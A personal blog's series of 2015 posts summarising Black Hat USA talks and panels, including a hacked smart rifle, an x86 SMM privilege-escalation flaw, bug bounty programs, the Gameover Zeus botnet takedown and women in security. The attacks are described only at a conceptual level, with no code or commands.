Friday, August 7, 2015

BHUSA15: Black Hat Roundup

I just got back from my first Black Hat conference!  This may seem strange, that I've never been, but it always  seemed to expensive and many of the talks were repeated at DefCon.  My first DefCon was DC2 - I was still basically a kid. I could not drink nor gamble, but I had a blast year after year meeting super bright folks and learning neat hacks.  Learning what I did at DefCon has definitely shaped my career - there's no way I would've ended up in a more than two decades long career in computer security without it.

Did DC have it's down sides? Yes, definitely. As noted by a woman on the "Beyond the Gender Gap" panel, it gets tiring "proving it again" (and again) every time I would walk into the room at DefCon. "Who's your boyfriend?" "I'm single" "Or, so you're a scene whore?" "No" "Oh, then you're a fed!"

Then I would have to proceed to prove my technical prowess over and over again. (best advice for men came from that panel: never start with "who are you here with?", but rather "What do you do?") [Note: I did have a boyfriend my first couple of DefCons, and later a husband - who did not come, as he wasn't interested in the con, but I was at other times single.]

DefCon also had amazing moments - here we are at DC9 in 2001. Babies!  (I don't seem to have older pictures on my site - but I was there, usually with Artimage and Angus).

But, that didn't happen at Black Hat. Folks (men and women) spoke to me like a human. It was really nice.  Other than when I went to the bar to meet one of my friends Tuesday night, nobody started at my chest. I was able to attend two women focused luncheons and meet lots of interesting and smart security focused women.  Black Hat USA has a Code of Conduct, lots of staff, and plenty of time between sessions to network, charge batteries or go pee.

I want to thank Runa Sandvick who first of all gave an awesome talk on a wifi rifle (you know, we all need one) and gave me the free pass to attend!

Still surprising to see people drinking at 7:30 in the morning, and drinking EVERYWHERE (in the elevator a lot).  Coming from California, all the smoking was strange, too. A guy sat next to me in a session "vaping" pot - really? Can't wait until break?  Fortunately, the conference halls were non-smoking, so I escaped an asthma attack.

Overall, a very informative conference! I would highly recommend, for the very high caliber, true research talks.

Did you have a good time? Any stories to share?

Thursday, August 6, 2015

BHUSA15: Hi This Is Urgent Plz Fix ASAP: Critical Vulnerabilites and Bug Bounty Programs

Kymberlee Price, Bugcrowd.(aka @kym_possible)

We won't be talking about low level bug bounty programs today, just the critical bugs. Kyberlee has extensive background as a developer and has been working lately on a "red team".

Google does a vulnerability reward program (VRP) that they produce some data one. It doesn't include the Chrome award, Android award, or patch award program - but it includes logs of other things! Google.com, google play, etc.  

The more time that passes, the fewer vulnerability reports that come in - but seems to be higher quality. Google has had to increase their bounty to keep the bugs coming in.

Facebook has a similar program and had 17,000 submissions in 2014 alone. Out of that, onlyl 61 high severity bugs. Their minimum award is $500.  Their total payout for valid submissions wwas $1.3 million to 321 researchers. Their top 5 researchers made a total of $256,750 - those had to be massive vulnerabilities.

India is Facebook's highest valid bug submissions, with Egypt coming in second - and USA in third place.  In India, the average payout was $1343, in Egypt $1220 and US $2470.

Github's bug bounty program is 1 year old today!

Microsoft will pay up to $100,000 for novel exploitation techniques against protections built into the OS, and an additional reward of up to $100,000 if you also develop a defense.

MS runs a "hall of fame" - which indicates you received a bounty. If your vuln results in a CVE, you'll be noted in the security alert.

Depending on whether it software or online services will change who is submitting your bugs (like India is very high for MS's online services, but not as many for software.

Followed 166  customer bug bounty programs, there were 37,227. There wer about eight thousand non-duplicate, valid vulnerabilities. Of those 3, 621 were awarded - paying out $700,00+ (average payout around $200, largest $10,000).

Every one of these programs is getting really critical vulnerabilities.

Who is finding these?  Professional Pen Testers and consultants (in their spare time), former developers, QA engineers and IT admins.

India, US and Pakistan are top three for volume of submissions.

Reginaldo Silva reported an XML external entity vulnerability within a PhP page tha would have allowed a hacker to change Facebook's use of Gmail as an OpenID provider to a hacker-controlled URL, before servicing requests with malicious XML codes. Fixed quickly and the developer was rewarded and recognized.

Kymberlee then did a deep dive into a few of these fun (and very serious) vulnerabilities found, even including videos and audio from the researchers who found these themselves. These vulnerabilities were things like banks and cars!

You need to make sure you tell researchers in advance what you need to help you triage it faster (this can be email or webform). Set expectations, but you need to have a rapid triage and prioritization process in place (to get to the P1s faster).

Now, don't expect an eloquent write up - English may not be their first language. Allow them to provide a video of the reproduction steps.

You need to have  your "in scope" and "out of scope" clearly defined, and a process for how to handle things that don't fit into either category (because they weren't defined well enough - it will happen).

To reduce noise, provide pointers to guidance and training, like Bugcrowd's forum.

Have a plan to deal with duplicates. Don't see this often for P1 or P2, because those are fixed quickly.  Don't let the lower priority bugs languish, either. If they are getting reported over and over again, you're wasting resources telling the researchers they have hit a duplicate - and if researchers are finding this every week, so are the bad guys.

 Some of the bugs can be so severe that they are worth the entire program. You don't want those vulnerabilities out there.

How to reduce noise? Publish and stick to your program SLA. Stop rewarding bad behavior (ie don't give someone "hall of fame" acknowledgement just because they are pestering you).  Don't create bad behaviour by being consistent, rewarding quickly, having good documentation.

By crowdsourcing this, you can bring people from around the world into your security team - people who cannot or do not attend conferences like Black Hat, etc.

This was a really fascinating and informative presentation!

BHUSA15: When IoT Attacks: Hacking a Linux-Powered Rifle

Runa A. Sandvik is a privacy and security researcher, working at the intersection of technology, law and policy.

 Michael Auger is an experienced IT security specialist with extensive experience in integrating and leveraging IT security tools.

Runa and Mike spent the last year researching the Trackingpoint 338TP. When CNN asked Runa why attack a rifle? She replied, because "cars are boring".

The base rifle is Remington 700 .308 bolt-action rifle. Hardware platorm is called "cascade, runs modified Angstrom Linux.

It uses Tag Track Xact (TTX) .

The wifi is off by default, and you cannot fire the rifle remotely.  The gun still works even if the scope/targeting system is broken - it is a gun, after all.

The first thing that they did was run a port scan on the rifle. It runs a webserver and rtsp server.

The more interesting side is the TrackingPont App - you can adjust settings for wind, media, and do software updates.

The mobile app was using encryption, etc.

 When they got stuck ... they just tried ALL THE THINGS! :-)

After round 1, found that the SSI contains the serial number, and it can't be changed. Guessable WPA2 key, and it also cannot be changed. Any RTSP client can stream the scope vie.

The API is unauthenticated, but it does validate input.

There is a 4 digit pin that locks advanced mode - you can brute-force. /set_factory_defualts" resets the lock.  Updates to the rifle are GPG encrypted and signed.

 Round Two...

Fortunately Tracking Point's website has an excellent diagram of what the rifle would look like, before tearing it a part. They actually used their CAD drawings in their marketing material.  Though, the website has a lot of 2D things, in reality the circuit board is round :-)

To get the circuit board out, you have to desolder at least 60-pins.

So excited to see it booting Linux!

But, alas, it did not auto-login as root.

Console access is at least password protected and the kernels and filesystem are on separate chips.

the filesystem chip was hidden under a big capacitor - missed it the first few times.

Some of the folks they were working with recognized the silk screening on the board and recommended an EMC to USB converter. Then got to see what was on the filesystem.

The webserver had a lot of interesting APIS, like ssh_accept - that could be fun!

The system backend requires unpublished API call to open port. The API validates input, backend does not. You can make temporary changes to the system. Can change wind, temperature, ballistics valus and control the solenoid, etc.  They could even lock the trigger, crash the gun, make the scope think it is attached to a different firearm, or make this one command segfault (which triggers reboot).

The changes are temporary, if the user reboots, the changes will be lost.

Now time for demos!

Watched a change in the ballistics screw up the calculation so that the shot hit the target next to the one you were aiming at.

TrackingPoint operates with two GPG keys for updates, one of which is on the scope. Update script accepts packages signed by either of the two keys. This will allow you to make persistent changes to the system AND get root access.

Successfully able to login with no password as root!

Round 3 findings: the Admin API is also unauthenticated, the system backend is unauthenticated and does not validate input. GPG key on the scope can encrpt and sign updates.

Did have to have previous access to the rifle for all of the attacks.

But, there are ways to do remote code execution - if you can get on the wifi.

it's not all that bad... USB ports are disabled during boot, media is deleted from scope once downloaded, SPQ2 is in use, even if key cannot be changed. The API does validate user input, console access is password protected and software updates are GPG encrypted and signed.

Will this get better?  Have been calling them since April, zero replies, until Wired called... since have received two calls. TrackingPoint is working on a patch. They have been easy to work with, once the connection was made.

"You can continue to use WiFi (to download photos or connect to ShotView) if you are confident no hackers are within 100 feet" - note on TrackingPoint's website. :-)

They had done security work (better than most people doing embedded work).

BHUSA15: Black Hat Panel – Beyond the Gender Gap: Empowering Women in Security

Kelly Jackson Higgins, Executive Editor at Dark Reading (panel moderator)

This is a growing industry, but women are leaving. We need more people, so how do we empower the women we have?

Panelists:
Justine Bone, Independent Consultant
Joyce Brocaglia , Founder Alta Associates (executive search firm for security, etc)
Jennifer Imhoff-Dousharm, co-founder, dc408 and Vegas 2.0 hacker groups
Katie Moussouris, Chief Policy Officer, HackerOne

All of the women here come from different backgrounds - hacking (black hat and white), executives, startups, big companies.

Justine learned a big hard lesson when she dropped out of industry to work on her own startup - at the same time as having kids.  While she was working her butt off, she wasn't showcasing her work or engaging with her peers - everybody thought she'd taken off time to have kids, totally unaware of the hard work she'd been doing. Lesson: always engage, promote, etc.

Joyce mentioned that she sees a lot of Employee Research Programs that are more checkboxes than actually beneficial programs for women. She noted that a company might pay Alta  $100-$150,000 to find a new executive, but when she asks if they'll pay $100,000 for leadership program with a proven track record - the same company will say "we don't have that kind of money." (note: sigh)

Katie started up a bug bounty program at MS - it was hard.  Big companies had vowed to never pay ransom for security bugs - she had to present this in a different way, to get it to line up with their goals, getting organizational empathy (when is the best time for devs to get vulns). Hence, IE 11 Beta Bug Bounty - which ran for 30 days. Alas, folks would hold on to their vulns until after beta was closed, forcing MS to release vulnerability reports.

We have a shortage of engineers, why aren't women coming in?  Jennifer said she doesn't see it as a pipeline problem - she noted that women that grew up in the 80s were exposed to computers (yay, Oregon Trail) and didn't hit the "cootie" program until they entered corporate America. It's scary to be the only person like you in the room - you don't realize it until you are that only woman. It doesn't matter how strong you are or how much you lean in, you have to carry that weight of diversity.

Justine noted the "DefCon problem" - it's annoying that everyone asks you "who are you here with? who's your boyfriend" - it gets exhausting. (Note: YES - happened to me every year, after my bf & I broke up and I continued to go alone).  Explaining over and over that you deserve to be there, what you do, that you really are technical.

Katie noted there's a challenge as well that you are expected to be a representative of ALL women, irregardless of how different we all are.  She hates the question: "what's it like being a woman in security?" - stop asking her about the least important aspect of her job and her personality, she is so much more than just "a woman in security."

Joyce notes that she sees job advertisements all the time that will literally use the male gendered pronoun, "he will be responsible for X, Y, Z". Knowing that men will apply for a job where they only meet 6/10 of the qualifications, and women require 9/10 before they will apply.. adding "he" to the description is one thing off the bat that the woman will not be.  Confidence matters as much as competence - men tend to have more confidence, which may help explain why women are not making it to the higher levels.

Companies need to invest in younger women to make these changes - they are an investment.  Women and men need sponsors, but companies should make sure that it's not only men getting them. If women are raising their hands for stretch assignments, but getting skipped over... is it their fault?

Justine noted that we also need to be willing to accept help - if someone tries to bring you into the "old boys club" - GO! Joyce cautioned, though, don't wait for it.

Justine says she's always criticized for her travel for work, by friends, family, etc. How could she leave her kids? She notes she's on these flights with a ton of men doing the same thing - and nobody criticizes them.

Can you have work and family?  Yes, but you need help - nannies, families, etc. "Women have the capacity to multitask and get shit done," Joyce.

Personal space at these events is important. Katie had a run in with "Handsy McMansy" last night - fortunately, she's adept at profanity to throw at him. The men around though seemed shell shocked and didn't know what to do. "I don't need somebody to fight for me, I need them to fight with me."

Joyce had a run in last night that was similar with a male executive, sloppy drunk, asking dumb questions and hanging on people. If a woman did that - she would be shamed by the men around.

Joyce noted that women still don't get taken seriously at booths at events like RSA.  People don't want to talk to the women, even if they may be the one making purchasing decisions.

Justine looked at the Black Hat review board this morning - there is only ONE woman on the review board. Not saying the men on the board are not skilled and talented, but they need diversity.

Joyce noted that women need to submit talks, start with smaller conferences and get practice, confidence, etc. 

Men should talk to women at conferences - acknowledge them, don't question why they are here - but actually engage. Like, "what do you do at your company?" vs "who's your boyfriend?"

Joyce noted that older generations of men are lacking the emotional intelligence to understand why what they are doing or saying is not okay. She has high hopes for the younger generations, who grew up with working mom's, etc.

Katie noted that women need to stop denigrating yourself - the world will do that for your. Speak about your work in positive tones, not "well, I don't do kernel work, I don't do... ". Believe in yourself and don't be afraid to tell the world about what you do.

BHUSA15: Information Access and Information Sharing: Where We Are and Where We Are Going

Alejandro Mayorkas, Deputy Secretary of Homeland Security.

Homeland security means security of our institutions, security of our way of life and most importantly security of our values.  Security of the Internet is very much a part of what we do. It is clear that the challenges of network security are immense. We as a government are making advances in this area, but we are not where we need to be.

Every morning, the secretary and get a briefing about threats, events that are occurring or are about to occur all over the world. Increasingly Internet security events are more common in that meeting.

The more he travels around the country, it becomes obvious how important this is for everyone.  Internationally, the same thing. Foreign companies and governments all care about this.

The current state of affair with individualized responses is not working well to ensure that the Internet is protected.  DHS considers themselves uniquely situated to address these concerns. DHS is a civilian agency, standing at the intersection of Private Sector, Enforcement community, Intelligence Community and desire to protect .gov.  They have created a critical response set of protocols and organization (National Cybersecurity Communications Organization).

DHS currently shares information in bulletins or entity to entity. It is not currently in an automated fashion. The President, in his last executive order, placed DHS in charge of leading information sharing with the private sector.

DHS wants an automated and near real time way to share and disseminate information, to raise the bar and capacity for the private sector to protect themselves.  When a threat is shared with DHS, they can receive that in automated form and disseminate in near real time to prevent replication of that threat.

One thing in their way: the issue of trust. That emanates from a variety  of sources - can DHS keep this secure? can you trust those providing information?

DHS needs to work on building trust - it will take time, but will be worth the effort.

As they are working on the automatic reception of cyber threats, please give them a chance and share some information so that they can prove their capabilities and prove their results.

Question about how important is it for private industry to participate?  Answer: very, many of them are very critical systems. It's critical they participate.

We have to understand our responsibilities for the public good. Alejandro hopes that sharing the cyber threat will have a public dimension. It's vital for them to be shared far more publicly than they are now. This is important for DHS's mission to secure this country.

DHS is very active in research and development in achieving network security - we are investing in public as well as private sector.

Various questions show that folks are nervous about sharing with the government, Alejandro noted that they will be working on correcting that.

Another questioner asked about the OPN breach, where NASA, etc, lost lots of personal information.  He noted that not all agencies are as advanced as others, and they've been doing a 30 day security activity with the goal of improving this.

Question: will information about 0-days that the government has bought be shared? Answer: we are going to declassify and release everything that we can.

Question: gov't is know for antiquated systems, how do we know you'll do this right? Alejandro noted that they have to start with new gear, and stay on top of the systems. (no Windows NT here)

Additionally, DHS is looking at recruiting the best and the brightest, and even looking at opening an office in Silicon Valley.

BHUSA15: Where? You can't Exploit What You Can't Find

Christopher Liebchen & Ahmad-Reza Sadeghi & Andrei Homescu & Stephen Crane

 We're concerned with many problems that are actually 3 decades old. Nowadays, everyone has access to cell phones. Many developers with different intentions and different background (particularly with security).

So - how do we build secure systems from insecure code?  Seems counter-intuitive, but we have to do it. We cannot just keep adding more software onto these old systems.

We've had decades of run-time attacks - like the Morris Worm in 1988, which just keeps going.

There are a number of defenses, but often the "defenses" are broken by the original authors juts a few years ago.  So, there is a quest for practical and secure solutions... 

Big software companies, like Google and Microsoft, are very interested in defending against run-time attacks, like Emet or CF Guard in MS or IFCC and VTV from Google.  But how secure are these solutions?

The Beast in Your Memory: includes bypass of EMET. return oriented programming attacks against modern control-flow integrity protection techniques... 

The main problems are memory corruption and memory leakage.

You can do a code-injection attack or a code-reuse attack.

Randomization can help a lot, but not perfect.

Remember, for return-oriented programmng: basic idea: use small instruction sequences instead of whole functions. Instruction sequences of length 2to5, all sequences end with a return instruction. Instruction sequences chained together, modifying what code is executed after return.

Assuptions for our adversary model: memory pages are writable executable, we also assume there is address space layout randomization (ASLR), and that it can disclose arbitrary readable memroy.

 Main defenses: code randomization and control flow integrity.


Randomization has low performance overhead and scales well to complex software  Though, this suffers with low system entropy and information disclosure is still hard to prevent.

For CFI: formal security (explicit control flow checks) - if something unexpected happens, you can stop execution (in theory).  It's  a trade-off be performance and secuity (inefficient) and chalenigng to integrae in complex software. 

What about fine-grained ASLR? You are just trying to make it more complicated.  But, this has been attacked by JIT-ROP (BH13).  That undermines any fine-grained ASLR and shows memory disclosures are far more damaging than believed. This can be instantiated with real-world exploits.

Then we got a pretty graphical demo of how JIT-RoP works.

Their current research is around code-pointer hiding.

Their objectives were to prevent code reuse & memory disclosure attacks. It should be comprehensive (ahead of time + JIT), practical (real browsers) and fast (less than 6% overhead).

We prevent direct memory disclosures by using execute-only code pages, which prevent direct disclosure of code. Previous implementations do not entirely meet our goals. So, we fully enforce execute-only permissions with current x86 hardware.

We have virtual addresses that get translated to physical addresses. During the translation, the MMU can enforce some translations. As soon as your code page is executable, it is also readable.  But you might want something to be readable, but not executable.  Can do this with extended page tables, which will note that something is only executable (not readable).

The attacker can leak pointers to functions that point to the beginning or in the middle - once he's got that pointer, he can figure a lot more things out.

So, we can add another layer of indirection: code pointer hiding!

They modified the readactor compiler so we would have codedata separation, fine-grained code randomization, and code-pointer hiding.

our goal is to protect applications which are frequent targets of attack. They have JIT (just in time) code, which is harder to protect, as it frequently changes.  Solution: Alternate EPT usage between mutable mapping RW-) and execute-only mapping (--X).

Now, does this actually work?  Checked performance with SPEC CPU2006 and chromium benchmarks. Checked practicality bye compiling and protecting everything in Chromium.

The full readactor caused roughly 6.4% slowdown. But, if you only protect the hypervisor in execute only mode, that's only around 2% performance impact, which seems acceptable.

How does it do wrt security? Resilience against (in)direct memory disclosure.

Code resuse attacks are a a severe threat, everyone acknowledges this. Readactor: first hardware enforced execute-only fine-grained memory randomization for current x86 hardware.












BHUSA15: The Memory Sinkhole – Unleashing an x86 Design Flaw Allowing Universal Privilege Escalation

Chris Domas is an embedded systems engineer and cyber security researcher, focused on innovative approaches to low level hardware and software RE and exploitation.

There has been a bug in x86 architecture for more than 20 years... just waiting for Chris Domus to escalate privileges.

Chris did the demo on a small, cheap netbook computer. In case it didn't work, he had a stack of netbooks.  We saw just running a program where a general user ran a simple program and had root.

Some things are so important that even the hypervisor should not be allowed to execute it.

We originally wanted to do power management without the OS to worry about it - system management mode. SMM becamse a dumping ground for all kinds of things, eventually it took "security" enhancements.  Now SMM is imortant: root of turst, TPM emulation and communication, cryptographic authentication...

Whenever there was something important or sensitive or secret, it got stuck in SMM.

Userland is at Ring 3, kernel in Ring 0 . Ring -1 is they hyperviser... Ring -2 is SMM. On modern systems , Ring 0 is not in control. We have to get deeper (and hide from) Ring 0.

If you're in ring 0 and try to read from SMM - you'll just get a bunch of garbage. Memory control separated SMRAM from the rest of the system. If you're in SMM, though, you can read from SMRAM.

There are many protections on SMM - locks, blocks, etc.  but most exist in the memory controller hub. Lots of research in this area on how to to get to Ring -2.

The local APIC used to be a physically separate chip that did this management. But, it's more efficient and cheaper to put the local APIC on the CPU.  Now it's even faster!

Intel reserved 0xfee0000-0xfee01000 - so to access, you have to do some round about ways to get there. When they created this model, this broke legacy systems that expected that segment of memory to map to something else. Looking at the Intel SDM, c 1997 describes what's happened here in the P6.

Now we're allowed to move where the APIC window is located, allowing us to access APIC reserved space.  This "fix" opens systems up to this vulnerability.

If we're in Ring 0, and we try to read SMRAM we will be denied. But, you can do it from SMM. What if we're in Ring 0, and relocate the APIC window. Now, from Ring 0, we can read SMRAM.  Now that we can do that, we can modify SMM's view of memory.  Now the security enforcer has been removed.

How to attack ring -1 from ring 0? SMRAM acts as a fe haven for SMM code. As long as SMM code stays in SMRAM, ring 0 cannot touch it. But if we can get SMM code to step out of its hiding spot, we can hijack it.

Move APIC over SmRM, corrupt execution , trigger fault in SMM. This gets is to look up an exception handler - under our control.  Though, that attack doesn't work. There's an undocumented security feature which causes a triple fault (reset) the system.

He overlayed APIC MMIO range at the SMI entry point: SMBAE+0x80000 - getting the APIC entry point and the SMBAE to overlap.

Now, we just need to store shell code in the APIC registers. The challenge is they have to be 4 K aligned. Place  exactly SMI entry. Execution begins @ exactly start of APIC registers.4096 bytes available.

Many registers are largely hardwired to 0, giving few registers that can actually be changed. We need to do something useful before the system resets.

You need to keep things from executing right away before our last byte is activated.

we only really have 4bits to do something to actively attack the system.  Looking at the opcode map, not a lot of interesting things.

But, the attack didn't work as expected. We still can't execute from the APIC, so must control the SMM with data alone.

How do we attack code when our only control is to disable some memory?

SMM code comes from system firmware.  Intel makes template code, which goes to independent BIOS vendors, then the OEMs (HP, Toshiba, Lenovo) makes more changes.

The only way to make a general attack is to look at the EFI template BIOS code from Intel, as that will be on EVERY system.

From ring 0, we try to sinkhole the DSC to switch it into system management mode.  We've lsot control, but maybe it'll let us do something before memroy resets.

(lots of stuff about self rewriting code, and far jumps and long jumps and lots of hex codes)

Then we successfully got the SMM to read code that we could control, by controlling the memory mapping.

With only 8 lines of code, to exploit: hardware remapping, descriptor cache configurations, etc.

In the end, used well behaving code in order to abuse a different area.

This has opened up a new class of exploits.  Now that we have Ring -2 control, what can we do?  We can disable the cryptographic checks, or turn off temperagur control, brick the system, or install a root kit.

Once we have the control, we can preempt the hypervisor, periodic interception, filter ring 0 i/o, modify memory, escalate processes, etc.

Adapted code from Dmytro Oleksiuk.

We can simultaneously take over all security controls. Mitigations don't look good. This is unpatchable, would need new processors.... Which Intel did. Their developers seem to have found this independently. This is now fixed with Sandy Bridge and Atom 2013. Now check in SMRRs with APIC is relocated.

intel.com/security has a write up on this. They have been easy to work with, and have been working on mitigations where ever it was architecturally possible.








Wednesday, August 5, 2015

BHUSA15: Panel: Getting it Right: Straight Talk on Threat & Information Sharing

Panelists: Trey Ford(@treyford) is the Global Security Strategist at Rapid7, Kevin Bankston (@kevinbankston) is the Director of the Open Technology Institute and Co-Director of the Cybersecurity Initiative at New America, and @brianaengl and @hammem (speaker lineup appears to have changed, so twitter handles are what I've got:-) (also, the podium is super giant and blocking my view of the speakers, so I can't tell you who is saying what).

Sharing sounds like fun, but it's not as simple as we remember from our childhood.  There are legal implications, contracts, source trust issues, etc.

Intelligence is like a UDP packet you cast out and hope for the best.  How do you determine if the information is still relevant?

Facebook is working on this - how to do exchange of data?  What can we learn from it?

When people start sharing data, they realize that they need to share with someone who cares. Ie if you're concern is about phishing, don't build a relationship with someone who is focused on bitcoin.

What is stopping companies from sharing information with other companies and the government? It will be relevant to you if new legislation passes.

Some of the barriers are around the wiretap act (Title II) portion of the ECPA which places limits on real-time communications and limits disclosure.Other limits: federal privacy laws protecting HIPPA data and educational records, self-imposed restrictions in Terms of Service, and anti-trust laws (DoJ could accuse them of colluding in an anti competitive way).

Well, and there are nervous lawyers :-)

Most threat information doesn't include content or PII. Non-content can be liberally shared, with exceptions for security and consent via ToS.  DoJ has stated they won't go after companies sharing for these reasons.  Companies already do a lot of sharing, so do they really need new legal permissions?

but there's the new CISA: Cybersecurity Information Sharing Act, S. 754.  It authorizes sharing of broadly defined "cyber thread indicators" and info about defensive measures" with "any other entity or [any agency of] the Federal Government".

DHS must distribute all information to other agencies including NSA, "not subject to any dleay or modification". Gov't can use the information to investigate or prosecute a range of crimes unrelated to cybersecurity.

The house is also working on bills!

Congress has looking at CISA since 2009, and they are starting to feel like they have to do something so they can show they are serious about cybersecurity.

Please call your senator to oppose the bill and support privacy enhancing amendments. If it does pass, it still has to go to conference with congress.

Check out StopCyberSpying.com or call 1-985-222-CISA for more information.






BHUSA15: Stranger Danger! What is the Risk from 3rd Party Libraries?

Kymberlee Price, Bugcrowd, and Jake Kouns is the CISO for Risk Based Security.

It's well known that vulnerability statistics suck (see Steve Christey's (MITRE)  Black Hat 13 talk).

But, the truth is - we are getting attacked, lots of new (and old) vulnerabilities.  This is getting worse every year, not better.

Secunia says there are 15000 vulnerabilities, but they counted Heartbleed as 210 different vulnerabilities (and our speakers say it was just one, while some audience members noted it was three).

There were 100+ vendors impacted by Heartbleed, impacting over 600,000+ servers.

Very large companies are using OpenSSL: Oracle, HP, Blackberry, Juniper, Intel, Cisco, Apple, Intel, etc... so, it's not just little startups using open source anymore.

There have been 52 new vulnerabilities fixed since Heartbleed - average score of CVSS of 6.78.  Nine of them had a public exploit available.

We're beating up on OpenSSL - but what about Gnu library (Ghost), which had a heap vulnerability in it. It's everywhere.

Efficiency at what cost?  By leveraging this third party source, companies can deliver faster, cheaper, etc. But what are companies picking up in exchange?  Some products have more than 100 third party libraries in them. Are they being treated with his much scrutiny as they should be?

The speakers aren't saying: "Don't use 3rd party libraries", but rather to think about things during design and development.

All of the data they are sharing this week are from public sources, even though that data is limited.

Look at FFMPEG - they have 191 CVEs, but over 1000 vulns fixed.

These vulnerabilities spread - think about the FreeType Project font generation toolkit. It's used by Android, FreeBSD, Chrome, OpenOffice, iOS, video games (including the American Girl Doll game).  Everywhere!  There was a vulnerability (missing parameter check) that allowed you to jailbreak your iPhone... or someone else to take over your iPhone.  This is insiduous, as you have to wait for the vendor to fix it..

libpng, Apache Tomcat... everyone is using this and including these things in toolkits.

We shipped a vulnerability to Mars! (Java is on the Mars Rover).

Interesting to note: some vendors don't even release CVEs for anything under CVSS of 5.0. Since 2007 the number of CVEs: OpenSSL (90), Flash (522), Java (539), FreeType (50), libpng (28), APache Tomcat (100).

Now, this is not telling you what is more or less secure. For example, Adobe has an excellent bug bounty program and internal pen testers. Just because a product has only reported a few, doesn't mean more aren't lurking.

We should consider time to relief. How long does the vendor know about the issue before they provide a fix? You can use this to figure out how seriously that vendor is about security.

Had to define a framework to understand time of exposure, identify vendors and products you want to work with and establish a scorecard.

Calculating Vendor Response Time is how long from when the vendor was informed before they responded to the researcher. This can't be an automated reply, but actual acknowledgement.

Time to patch - when do the customers get relief.

But another time to consider: how long were customers vulnerable? That is, how long from when the patch is available to when the patch was applied (many folks only do updates quarterly, for example).. Total time of exposure covers the period from when the vulnerability was discovered until when was it fixed at the customer site.

We got to walk through a few case examples.

In one case, a researcher reached out to a company on twitter asking how to securely disclose a vulnerability - and for 2.5 months they kept pointing the researcher at their insecure support page.

It is critical for vendors to respond promptly and investigate the issue.

And this data is hard to figure out, as the terminology for "zero day" (oh day, 0 day) seems to be malleable.The speakers believe that it's only a 0-day when the vendor does not know about it.  Once he vendor knows, or the vuln is publicly disclosed, then it's no longer a zero day.

In one case, the vendor created a patch - but did not release it, instead they wanted to roll it up to their next version release. In the end, their customers were exposed for 451 days.

While most companies update their systems every 30 days, their exposure could be much longer due to a vendor not actually providing the  fix to their customers.

Advice: once you incorporate a 3rd party software suite into your tools, you need to become active in that community, watch it, help out, provide funding, or you are putting your own customers at risk.

You also need a clear prioritization scheme, to know what to fix and when (as most likely your incoming rate is higher than your fix rate)..  Proactively manage your risk. Understand what third party code your organization relies and implement a plan to address the exposure, and work with the vendors.




BHUSA15: Gameover Zeus: Badguys and Backends

Speakers: Elliott Peterson is a Special Agent with the FBI in the Pittsburgh Field Office. Michael Sandee is a key member in the Fox-IT financial malware intelligence unit. Tillmann Werner is the Director of Technical Analysis at CrowdStrike Intelligence.

Gameover Zeus went after backend banking systems, very successfully, a botnet run by an organized crime game. It was designed to make it impossible to be subverted by the good guys.

We estimate that the losses ranged from $10,000 to $6,900,000 / attack. The criminals had knowledge of International banking laws, leveraged international wires, and used DDoS attacks against the banks to distract and prevent the victims from identifying the fraud.

Dirtjumber Command/Control was being used.

They see the $6.9 million loss, informed the bank - but the bank could not find the loss. It took a long time to find, due to the DDoS. The FBI was finally able to track down who was receiving the funds in Switzerland and put a stop to this. Now the feds can prevent the transactions and even get the money back in he end.

The first Zeus came out in 2005 as a crimeware kit. The primary developer "abandoned" the project, and turned it into a private project in 2011.

JabberZeus crew was using the kit malware then moved into Zeus 2.1.0.x, which included support for domain generation algorithm, regular expression support and a file infector.  Then, in September it was upgraded to Mapp 13, which includes peer-to-peer + traditional comms via gameover2.php.  The focus was on corporate banking, and would often drop in additional malware (like CryptoLocker).

The attack group seemed to have 5 years experience, some as many as 10. Mainly from Russia and Ukrain, with two leaders.  Included support staff and 20 affiliates.

They had "bulletproof" hosting - exclusive servers together, virtual IP addresses, new address in 2 business days - very expensive!  Additionally, proxies all over the place - like in front of the peer-to-peer network.

The network was proteted using a private RSA key.

The FBI, and their private assistants, had to watch for traffic patterns and cookie theft/removal. For example, they could remove your existing cookie to force you to login again so that they could get your password.  Once they got what they wanted, they would block (locally) access to the bank's website.

This wasn't just financial, but also political. There was espionage, targeting intelligence agencies, looking for things around the Crimea and Syrian conflicts.  Specifically looking for top secret documents, or agent names.


Why take control? If not, if the feds presence was detected, the command engine could shut down and destroy the rest of the botnet.

The botnet uses a basic p2p layer. Every infected machine stores  a list of the neighbor nodes, updated often and peers talk directly to each other - getting weekly binary updates!

They had proxy nodes, which were announced by special messages to route C2 communication (stolen data, commands). Many nodes in the cluster are not publicly accessible, so there are proxy nodes that encapsulate traffic in HTTP so they can continue to communicate with infected machines behind a firewall.

The criminals was also configured to NOT accept unsolicited responses - must match a request, so the feds (and friends) could not use a poisoning attack.

Goal: isolate bots, prevent normal operation, by turning the p2p network into a centralized network with the good guys at the controls (a sinkhole).

The good guys had to attack the proxy layer with a poisoning attack. Peers maintian a sorted list of up to 20 proxies, regular checks if still active. Had to poison that list, and the make sure none of the other proxies reply any more.  Needed to work with ISPs to get access to some active proxies.

Needed to take over the command and control node first - that's where the commands came from.  Once they were in, they killed the old centralized servers (one was in Canada and the other in the Ukraine). Took advantage to completely change the digraph and essentially took down the botnet.

Needed to watch emails exchanged with "Business Club". Helpfully, "Business Club" kept ledgers!

The FBI need to look at the seams , to find who these people were. For example, Bogachev used the same VPN servers to log into his personal/identifiable accounts as he used to control the bot net.

They are still looking for him. The FBI is offering $3 million for information leading to the capture of  Bogachev (showed us pictures of the guy - he likes his fancy boats).

Let me know if you get a piece of that bounty!




BHUSA15: Executive Women's Forum

Alta Associates hosted Black Hat's Executive Women's Forum! The discussion was led by none other than Joyce Brocaglia, CEO of Alta Associates and Founder of EWF.  This was a great opportunity to network with other women working in security and hear more about the programs of EWF (and lunch was good, too!)

EWF focuses on women making decisions in security and privacy, hosting an annual conference where women can spend time with other women working in security. Women who have attended past conferences note how awesome it is to be surrounded by so many intelligent and security focused ladies. It's very inspiring to see the success stories and see how they got there and learn about their road blocks.

In addition to the major EWF conferences (this year's is October 20-22, 2015 in Scottsdale, AZ), they do local events as well.

This year's conference's theme is Big Data, big Risks, Big Opportunities, with talks on negotiating, opportunities and innovation in healthcare big data, data sovereignty, global cybersecurity policy and government control and the voice privacy conundrum. Also, includes a themed dance party!

EWF provides mentors to help junior and middle managers get to the next step, as an inspirational conference is good to get things started, but not maintain progress. They've got a program called The Leadership Journey. It's a year long program! Covering things like establishing your leadership vision, optimizing emotional and social intelligence, managing stress and cultivating resilience, work/live integration (because there is no balance).

The soft skills are actually the hard skills - lots of people are good at coding, but not any good at the truly hard stuff - the "soft skills".

